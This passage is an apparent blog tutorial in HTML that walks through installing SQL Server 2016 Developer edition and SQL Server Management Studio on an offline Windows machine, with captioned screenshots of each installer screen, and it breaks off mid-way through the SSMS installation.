<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrs2toBogNM0XuVlLQ23rE1ZLYkDtTEBqLbCcYPvyRDk44AEdQAl47IcwKHQYqxPnEY5VoXmf60KBCghQf_hL0iEIQGZ_KnC17heBo07-99ZTReob-ay0dejkMcNQffHsF79DT7OPtvbcW/s1600/box_and_exe_dl.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrs2toBogNM0XuVlLQ23rE1ZLYkDtTEBqLbCcYPvyRDk44AEdQAl47IcwKHQYqxPnEY5VoXmf60KBCghQf_hL0iEIQGZ_KnC17heBo07-99ZTReob-ay0dejkMcNQffHsF79DT7OPtvbcW/s640/box_and_exe_dl.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The files "SQLServer2016-DEV-x64-ENU.box" and "SQLServer2016-DEV-x64-ENU.exe" in the download folder</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Step 2: Download Microsoft SQL Server Management Studio </b></span><span style="color: #0000ee;"><u>https://docs.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms</u></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The Microsoft SQL Server Management Studio (SSMS) allows you to interact with data from the SQL database in a fairly easy, fairly straight forward manner. Even if you have very limited experience dealing with data from SQL, you can pretty easily start to navigate your way through with some of the built in options from SSMS. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5HdTdDDNBYmDQcP8Z7xg4ANZIdfHgHBizx09RyqCSXX23vinC4e6q4n3vuKcKiVs9ZipKxjXcCkRXU9Spmt18HzOXC_3HW4sqjsCFDXC2ygvNU7k1i6uGHiGgI9tRdGIstvSoV7T_6QkA/s1600/dl-ssms.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5HdTdDDNBYmDQcP8Z7xg4ANZIdfHgHBizx09RyqCSXX23vinC4e6q4n3vuKcKiVs9ZipKxjXcCkRXU9Spmt18HzOXC_3HW4sqjsCFDXC2ygvNU7k1i6uGHiGgI9tRdGIstvSoV7T_6QkA/s640/dl-ssms.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose "Download SQL Server Management Studio" option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There should a file with a name similar to "SSMS-Setup-ENU.exe" now saved in your downloads folder. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8vrZ2S-guJkfGhcbo-CZnpVem3GkIvg9OxocQ62gQOKyGTkVB3u6AEs4Fgc5ZefyzIszGyV4e57erJ0bSqK5Kpb8yov-RnL0DlnhhTk7tUVRSiNjmQLbAROi6LKQNoKnsrFwTCz5gr_65/s1600/smss-in-dl.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8vrZ2S-guJkfGhcbo-CZnpVem3GkIvg9OxocQ62gQOKyGTkVB3u6AEs4Fgc5ZefyzIszGyV4e57erJ0bSqK5Kpb8yov-RnL0DlnhhTk7tUVRSiNjmQLbAROi6LKQNoKnsrFwTCz5gr_65/s640/smss-in-dl.jpg" width="518" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">SSMS-Setup-ENU.exe saved in the "Downloads" folder</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Step 3: Copy executables to flash drive</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The filenames themselves may change based on exactly when you download them, but you should now copy the two SQL Server installation files (.box and .exe) and the SSMS installation file to a flash drive so you can transfer it to your offline system.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqwwGihI_HV7NVA3zOrCcyz4gWzm_yQ1RvpBsy_aXX15q50iYCs-YyvNRuiGbLl2imgJO4nxp416sIGBs3pd-slTSTxVWJek_TLqITbyzd9a9l2NWnr1uTmYJQRPcjj1fhnh6d7aFyDGK/s1600/files_on-flashdrive.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqwwGihI_HV7NVA3zOrCcyz4gWzm_yQ1RvpBsy_aXX15q50iYCs-YyvNRuiGbLl2imgJO4nxp416sIGBs3pd-slTSTxVWJek_TLqITbyzd9a9l2NWnr1uTmYJQRPcjj1fhnh6d7aFyDGK/s640/files_on-flashdrive.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Files copied to flash drive for offline system</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Step 4: Copy executables to offline system</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Although you can install it directly from the flash drive, in my experience it is always better to copy the needed files to your offline system. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisLK_sKT47BzEW9EY-v0cNQzSljCiNtNOXOGnMgnOJhdx1x6_7NZO90vh3kAD7JqsMGHoDgrfJNaMBvpBU77RjzX8I0oSU-Jp8wk5VpEeXxId_3ZG1DpJ2UUuue1YJqZ5kjF1ngx9_MSsS/s1600/Copied_to_offline_system.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisLK_sKT47BzEW9EY-v0cNQzSljCiNtNOXOGnMgnOJhdx1x6_7NZO90vh3kAD7JqsMGHoDgrfJNaMBvpBU77RjzX8I0oSU-Jp8wk5VpEeXxId_3ZG1DpJ2UUuue1YJqZ5kjF1ngx9_MSsS/s640/Copied_to_offline_system.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Files copied to offline system</span></i></td></tr>
</tbody></table>
<br />
<br />
<span style="font-size: large;"><b>Step 5: Install SQL Server</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The first thing we are going to do is install SQL Server to our offline system. When you double-click the file you are greeted with a popup asking for the directory in which you wish to save the extracted files. I just left this as the default option and clicked "OK".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZCj7wFc3-3RWA2quNGFomfohmjD0vfPAb3Sa1k6gIT6sdzrg_jDNEsbSF6fx7a5AP6XdB1jWBH6WZb00_cXdobXJC728_PGRTkxWjbdUXoFA7y1-fRoimQBBiLW6x_J1wEX7Ki71pJFFb/s1600/Extracted_files-question.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="412" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZCj7wFc3-3RWA2quNGFomfohmjD0vfPAb3Sa1k6gIT6sdzrg_jDNEsbSF6fx7a5AP6XdB1jWBH6WZb00_cXdobXJC728_PGRTkxWjbdUXoFA7y1-fRoimQBBiLW6x_J1wEX7Ki71pJFFb/s640/Extracted_files-question.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Choose the directory for extracted files</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You will see a file extraction progress bar.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO3QYafhw3FAas6o5OjdbqhULy5N0cf5Q3G5FBlGGnrIA8ixt5koh-t-18TGs_A09gtQ5AB5ARDAa3QcK6Qg9Jt7Dy0-NnA_xojnv21KHMz1MK4yxiD6vpDOxEm-ROaTWWOkoNx-30Y8YR/s1600/extracting_files.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO3QYafhw3FAas6o5OjdbqhULy5N0cf5Q3G5FBlGGnrIA8ixt5koh-t-18TGs_A09gtQ5AB5ARDAa3QcK6Qg9Jt7Dy0-NnA_xojnv21KHMz1MK4yxiD6vpDOxEm-ROaTWWOkoNx-30Y8YR/s640/extracting_files.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">File extraction progress</span></i></td></tr>
</tbody></table>
</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">and when that is done, you will see a new window titled "SQL Server Installation Center". We are going to install SQL Server on our system, so click on the Installation link.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDn8Yo8mp9sjpdYOUSKOUAaDf4oIa2xuR3l2ciBMLT8Ly9DSb0S9Zea7aLJfoH39yLvkGhlL6vr0vwxVoEysHnbuSNfvX0ARosoDPxnMIY7DpfhbprlGFCknn10EX2f-2M7CjZU-JNx8xD/s1600/Choose-installation.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDn8Yo8mp9sjpdYOUSKOUAaDf4oIa2xuR3l2ciBMLT8Ly9DSb0S9Zea7aLJfoH39yLvkGhlL6vr0vwxVoEysHnbuSNfvX0ARosoDPxnMIY7DpfhbprlGFCknn10EX2f-2M7CjZU-JNx8xD/s640/Choose-installation.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choosing the Installation link</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">There are several options that are presented here, but we are only interested in the first one, labeled "New SQL Server stand-alone installation or add features to an existing installation".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmedYHat30ueb6R_0Hmtf4GXBnc0I59zPEh88iyvVO0FO8IrC3A5DME-K46ixZeYsImUhq0GkL5veOXVpsJUQ2xt8rgag_p4r_KzKzHp13rOY3aHk0WQtuNTFmqJGLmtHThG1_W8CNnIO-/s1600/installnewserver.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="510" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmedYHat30ueb6R_0Hmtf4GXBnc0I59zPEh88iyvVO0FO8IrC3A5DME-K46ixZeYsImUhq0GkL5veOXVpsJUQ2xt8rgag_p4r_KzKzHp13rOY3aHk0WQtuNTFmqJGLmtHThG1_W8CNnIO-/s640/installnewserver.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose to install a new SQL Server instance</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once you click that option, you will see the installation screen. Because we have the Developer edition, there is no need to enter a product key, so just click Next.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnbjG4Iy50IKyDToFHsqBt7HZRVxLoDTc2rcwpd3e6DRUH_KpZeGgMphudqNN81wPIQ-Ap1QiPIMBzaP_eBSqNwnujE7xOi2eSl_pQBsvLKGApMO_WzD8H61H48eAM_2Hacc6BncrvZzz/s1600/productkey-install-screen.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnbjG4Iy50IKyDToFHsqBt7HZRVxLoDTc2rcwpd3e6DRUH_KpZeGgMphudqNN81wPIQ-Ap1QiPIMBzaP_eBSqNwnujE7xOi2eSl_pQBsvLKGApMO_WzD8H61H48eAM_2Hacc6BncrvZzz/s640/productkey-install-screen.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Product Key" screen</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Check the box on the next screen next to "I accept the license terms".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXCvIdME4TfEkfvEEtTa7F4H3DnDTYRKKbZuoMfQSFOUaOenABTAbgHJp2VcfeBwUwDM7bPO_54bIQweam6hE3v52RVTFCjExMqtMeGx-hXqQK_UI2WdXZGFtVHp2OlArpMPRwvPkLc32u/s1600/license-terms.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXCvIdME4TfEkfvEEtTa7F4H3DnDTYRKKbZuoMfQSFOUaOenABTAbgHJp2VcfeBwUwDM7bPO_54bIQweam6hE3v52RVTFCjExMqtMeGx-hXqQK_UI2WdXZGFtVHp2OlArpMPRwvPkLc32u/s640/license-terms.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Accept the license terms (you did read all the way through it, right?)</span></i></td></tr>
</tbody></table>
<br />
<br />
<span style="font-size: large;">Your system is offline, so there is no need to check the box about using Microsoft Update, so just click Next.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg688Lj0ymLZFUxQWDF_Cx6E-HwlmkBB1PWDH2zrNZJowQsp6j3Vuqt6bx3S1hFthb221aaqUTr4jBQyBBP-pFVitxvoJcFgtcilMjbCcrxAmBThqz1CTVMoLiFZQZLlplEpB_NNV-LRbyj/s1600/use-ms-update.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg688Lj0ymLZFUxQWDF_Cx6E-HwlmkBB1PWDH2zrNZJowQsp6j3Vuqt6bx3S1hFthb221aaqUTr4jBQyBBP-pFVitxvoJcFgtcilMjbCcrxAmBThqz1CTVMoLiFZQZLlplEpB_NNV-LRbyj/s640/use-ms-update.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Our system is offline, so this does not apply</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Again, because the system is offline, you will see an error message saying it could not search for updates. This is fine, so just click Next.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYukFW1w4cas7DnCmpt0-kJEeV5NVsrSYpM4iRFdEYFpTlOmGTCTHF4n2zBAGuTJg0tV-TvjjAX0oCCvs8JI_GNhgjAvTwq8qseG_IIWU7E7Pw45rtwyxkQUIWSsRIUWcy-LJiKwBETYra/s1600/this_is_fine.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYukFW1w4cas7DnCmpt0-kJEeV5NVsrSYpM4iRFdEYFpTlOmGTCTHF4n2zBAGuTJg0tV-TvjjAX0oCCvs8JI_GNhgjAvTwq8qseG_IIWU7E7Pw45rtwyxkQUIWSsRIUWcy-LJiKwBETYra/s640/this_is_fine.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Looks bad, but it is ok as our system is offline, so this is fine!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You should now see a screen labeled "Install Rules" that should list a couple of passed items and a couple of failed items. The .NET Application security should have a warning because the system is offline. However, depending on your system settings, the Windows Firewall may generate a warning because it is on, or it may pass because it is off.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWNESbA-ItYV-qyOoX6T_jDuT1vHygs5QxRp-LeXWZPhTcud4T7IVGXd81ujDHHTm-6M_J74FzS7Awor_gwpaFpMXtDBz0AtUgAWXpq9lNHS_6jwm4LL3cyrU9NK84aC60Nv4yJMHWngrZ/s1600/install_rules.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWNESbA-ItYV-qyOoX6T_jDuT1vHygs5QxRp-LeXWZPhTcud4T7IVGXd81ujDHHTm-6M_J74FzS7Awor_gwpaFpMXtDBz0AtUgAWXpq9lNHS_6jwm4LL3cyrU9NK84aC60Nv4yJMHWngrZ/s640/install_rules.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Install Rules" status</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You should now see a screen labeled "Feature Selection". Here you can choose to install everything, but in my limited testing just selecting "Database Engine Services" was enough. You can also choose where to install the files, but again the default(s) should be sufficient.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv75P6Ajeakzw5M9UTBnDH38WObz5sKoWE2cq1nejJqUl_33z1usU2jQC1qiT4hGjkw3XRcmhMYIPDqOS3nk_6kqXnZOfNGFVCXsjy7F79VrL2BYALceB7P6S1lmSueSOTzDKfGEFj2GHf/s1600/database_engine_services.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv75P6Ajeakzw5M9UTBnDH38WObz5sKoWE2cq1nejJqUl_33z1usU2jQC1qiT4hGjkw3XRcmhMYIPDqOS3nk_6kqXnZOfNGFVCXsjy7F79VrL2BYALceB7P6S1lmSueSOTzDKfGEFj2GHf/s640/database_engine_services.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Feature Selection. Select as little, or as much, as you would like!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span><span style="font-size: large;">It may take a few minutes, but when it is finished you will see a screen labeled "Instance Configuration". You can choose whatever options you would like, but I personally prefer to leave the defaults again.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9uhUCwdw9Sra9zOwgskl7rdLdUrXLbYhdk4Vab2-k-ohINGkHMTZKnYHcBgO9T7LQswZ5NAMCD80VP1Ds7y0Tsy4cBfucrRjq5xrbCsH4Q0_ApTn3mezTdMs9_zqWDcs6jQU3nmMv13GK/s1600/instance_configuration.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9uhUCwdw9Sra9zOwgskl7rdLdUrXLbYhdk4Vab2-k-ohINGkHMTZKnYHcBgO9T7LQswZ5NAMCD80VP1Ds7y0Tsy4cBfucrRjq5xrbCsH4Q0_ApTn3mezTdMs9_zqWDcs6jQU3nmMv13GK/s640/instance_configuration.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Instance Configuration"</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">It may take a few minutes, but when it is finished you will see a screen labeled "Server Configuration". You can choose different options of course, but again I prefer to leave the defaults.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcjYri6DVcoDSOI4ZQBV94_N1soNn8j1zMbO5yNAwvor6WnuK7JEeCZUPm52HX15vSBoL6_YgRbpn2xYxAplCAIaTr3nZg5B5urI59JNiSjFCQiy-YZAzw-rAp34D0QUJyGxczzQP7spnK/s1600/server-configuration.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcjYri6DVcoDSOI4ZQBV94_N1soNn8j1zMbO5yNAwvor6WnuK7JEeCZUPm52HX15vSBoL6_YgRbpn2xYxAplCAIaTr3nZg5B5urI59JNiSjFCQiy-YZAzw-rAp34D0QUJyGxczzQP7spnK/s640/server-configuration.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>"Server Configuration"</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Next you should see a screen labeled "Database Engine Configuration". I prefer to just leave "Windows Authentication Mode" checked. You must also choose at least one account as a SQL Server administrator; the easiest option is to click the "Add Current User" button, which populates the list with your own account. Once that is finished, click Next.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZSEL3AxZbqBh6k8zYDFNYJ6vATxiGhYlqOSANeghRBqXw1Nz5jXa1c2Qw_0poeQPwiD3pwtLbCHFmpgsEeNHqgw8Dnt2d0AtwXD_BHS54dI08smLRl3n2sQ8XiiIpZQVgeZZMRaQzgTaZ/s1600/database-engine-configuration.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZSEL3AxZbqBh6k8zYDFNYJ6vATxiGhYlqOSANeghRBqXw1Nz5jXa1c2Qw_0poeQPwiD3pwtLbCHFmpgsEeNHqgw8Dnt2d0AtwXD_BHS54dI08smLRl3n2sQ8XiiIpZQVgeZZMRaQzgTaZ/s640/database-engine-configuration.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Database Engine Configuration. Don't forget to add a SQL Server administrator!</span></i></td></tr>
</tbody></table>
<br />
<br />
<span style="font-size: large;">Now that ALL that work is done, you should see a screen that resembles a tree hierarchy. Now you can click the Install button and install your SQL Server instance! This will probably take some time, so be patient!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfjJ2cszcVX9XLamk8WHZJZf9IeNggG8J_t2a0ZGZA09qSgbbZArb2U0M5QdDQYU-tZUwafqQuECVqXbIpn8BwxuJOgAw-LDkkZDWlao_BgfZ9xIr4iSGCP1hM4K-AV4n9yNMUdfKlmbmY/s1600/ready_to_install.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfjJ2cszcVX9XLamk8WHZJZf9IeNggG8J_t2a0ZGZA09qSgbbZArb2U0M5QdDQYU-tZUwafqQuECVqXbIpn8BwxuJOgAw-LDkkZDWlao_BgfZ9xIr4iSGCP1hM4K-AV4n9yNMUdfKlmbmY/s640/ready_to_install.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Ready to install at last!!</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Once that is finished, you should see a screen that is labeled "Complete" and several options should all say "Succeeded" next to them. You can now click "Close".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgilfZ0e1hOZU8-A9FoGwqso9eW9ZFpbV0j0Jqgh-wlnBssAcl4dDooott1WCKYNyTOORKhYTP97VE7tI7i0tqiUxKYpjkTXkZeWMLk5MdTZ9evcgLaAjWSd_pK5amVBYdM88KzAh36OAHl/s1600/complete.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgilfZ0e1hOZU8-A9FoGwqso9eW9ZFpbV0j0Jqgh-wlnBssAcl4dDooott1WCKYNyTOORKhYTP97VE7tI7i0tqiUxKYpjkTXkZeWMLk5MdTZ9evcgLaAjWSd_pK5amVBYdM88KzAh36OAHl/s640/complete.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">All done!!</span></i></td></tr>
</tbody></table>
<br />
<br />
<span style="font-size: large;"><b>Step 6: Install SSMS</b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now, although the Installation page of the SQL Server Installation Center does have an "Install SQL Server Management Tools" link, that link simply opens a web page and tries to download the installer, which means you need an internet connection to use it. That is exactly why we downloaded SSMS separately and have it on our offline system ready to install!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">To begin the process, double click the executable, and you should see a screen with "Microsoft SQL Server Management Studio" on it. All we have to do here is click "Install".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ2rP02nVhTnpeiV-HTEguMJ6E954j6c1By_sag-ruJxWBktwptj5PGyeqH2kTdGWnjysC4i_esUTow6QoTp8n2ftKnh5siDpywZIDBuUoavhU-90A7vxP5wuZYz4WatCH0WxLfN4ZMWkk/s1600/install-ssms.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ2rP02nVhTnpeiV-HTEguMJ6E954j6c1By_sag-ruJxWBktwptj5PGyeqH2kTdGWnjysC4i_esUTow6QoTp8n2ftKnh5siDpywZIDBuUoavhU-90A7vxP5wuZYz4WatCH0WxLfN4ZMWkk/s640/install-ssms.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Installation screen for SSMS</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You should see a screen showing packages being loaded; this part of the install will likely take a few minutes.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
